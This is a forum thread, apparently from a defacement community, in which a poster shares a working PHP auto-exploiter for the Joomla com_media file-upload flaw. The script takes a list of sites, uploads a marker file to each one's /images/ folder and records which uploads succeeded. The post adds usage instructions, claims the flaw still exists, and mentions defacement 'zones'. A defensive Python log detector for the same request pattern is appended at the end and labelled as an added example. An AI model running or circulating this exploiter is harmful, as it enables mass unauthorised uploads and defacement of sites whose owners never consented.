Could they have patched their vulnerabilities?
But not even a single one went down, haha. But you solved it!
Thanks.
Hello guys,
There are people asking for an exploit.
The exploit I am going to share is the Joomla com_media exploit. The vulnerability still exists.
PHP:
```php
<?php
// Tu5b0l3d -IndoXploit-
// http://blog.indoxploit.or.id/2016/05/auto-exploiter-commedia.html
error_reporting(0);

function save($aso){
    $fp = @fopen("aq.htm", "a") or die("cant open file");
    fwrite($fp, $aso);
    fclose($fp);
}

if($argv[1] != ""){
    $nama = $argv[1];
    $buka=fopen("$nama","r");
    $size=filesize("$nama");
    $baca=fread($buka,$size);
    $sites = explode("<br>", $baca);
    $file = "sht.txt";
    foreach($sites as $sitesn){
        $site = parse_url($sitesn, PHP_URL_HOST);
        $urlq = "http://$site";
        echo "$urlq\n";
        $ch4 = curl_init ("$urlq/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=");
        curl_setopt ($ch4, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch4, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt ($ch4, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch4, CURLOPT_COOKIEJAR,'coker_log');
        curl_setopt($ch4, CURLOPT_COOKIEFILE,'coker_log');
        $data = curl_exec ($ch4);
        curl_close($ch4);
        preg_match("/<form action=\"(.*?)\" id=\"uploadForm\"/", $data, $action);
        preg_match("/name=\"return-url\" value=\"(.*?)\"/", $data, $return);
        $action = $action[1];
        echo "$action\n";
        echo "$return[1]\n";
        $post = array("Filedata[]" => "@$file",
                      "return-url" => "$return[1]",
        );
        $ch2 = curl_init ("$action");
        curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt ($ch2, CURLOPT_POST, 1);
        curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
        curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
        $data2 = curl_exec ($ch2);
        curl_close($ch2);
        $a = file_get_contents("$urlq/images/$file");
        if(preg_match("/Hacked/i", $a)){
            echo "Ok\n$urlq/images/$file\n\n";
            save("<a href='$urlq/images/$file'>$urlq/images/$file</a><br>");
        }
        else{
            echo "NO\n\n";
        }
    }
}
else{
    echo "usage php $argv[0] target.txt\n\n";
}
?>
```
Usage is: php com.php sitelist.txt
Create a folder on the desktop, put the exploit in it, then put your txt file in it and run the scan. It will save the results as aq.htm in the folder it is in.
Example sites are available below. You can try it out. Their zones have already been taken; you can take a zone from a different mirror site. If you run into problems, write under this thread, do not send a PM.
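Seen from the server side, the script above leaves a three-request trail per site: a GET of the com_media image view, a POST to the upload form's action, and a GET of the new file under /images/. The following is an added example, not part of the original post, that correlates that sequence per client in an access log; the combined log format, the sample lines (including the `task=file.upload` action and the documentation IP addresses) and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2016:10:01:02 +0000] "GET /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2016:10:01:03 +0000] "POST /index.php?option=com_media&task=file.upload&tmpl=component HTTP/1.1" 303 0 "-" "-"
203.0.113.7 - - [12/May/2016:10:01:04 +0000] "GET /images/sht.txt HTTP/1.1" 200 7 "-" "-"
198.51.100.9 - - [12/May/2016:10:02:00 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2016:10:03:00 +0000] "GET /index.php?option=com_media&view=images&tmpl=component HTTP/1.1" 403 310 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')

def is_media_request(url):
    """True when the query string routes the request to com_media."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("option") == ["com_media"]

def find_upload_chains(log_text):
    """Return (client_ip, path) for each form GET -> upload POST -> /images/ GET chain."""
    stage = {}  # ip -> 1 (upload form served) or 2 (upload POST accepted)
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, url = m["ip"], m["method"], m["url"]
        status = int(m["status"])
        path = urlsplit(url).path
        if is_media_request(url):
            if method == "GET" and status == 200:
                stage[ip] = 1            # form was served to this client
            elif method == "POST" and status < 400 and stage.get(ip) == 1:
                stage[ip] = 2            # server did not reject the upload
        elif (stage.get(ip) == 2 and method == "GET" and status == 200
              and path.startswith("/images/")):
            hits.append((ip, path))      # client confirmed its file is reachable
            del stage[ip]
    return hits

if __name__ == "__main__":
    for ip, path in find_upload_chains(SAMPLE_LOG):
        print(f"possible com_media upload chain from {ip}: {path}")
```

A hit means the media manager served its upload form and accepted a file from that client; the file named in the hit is the first thing to inspect and remove while upload permissions are reviewed.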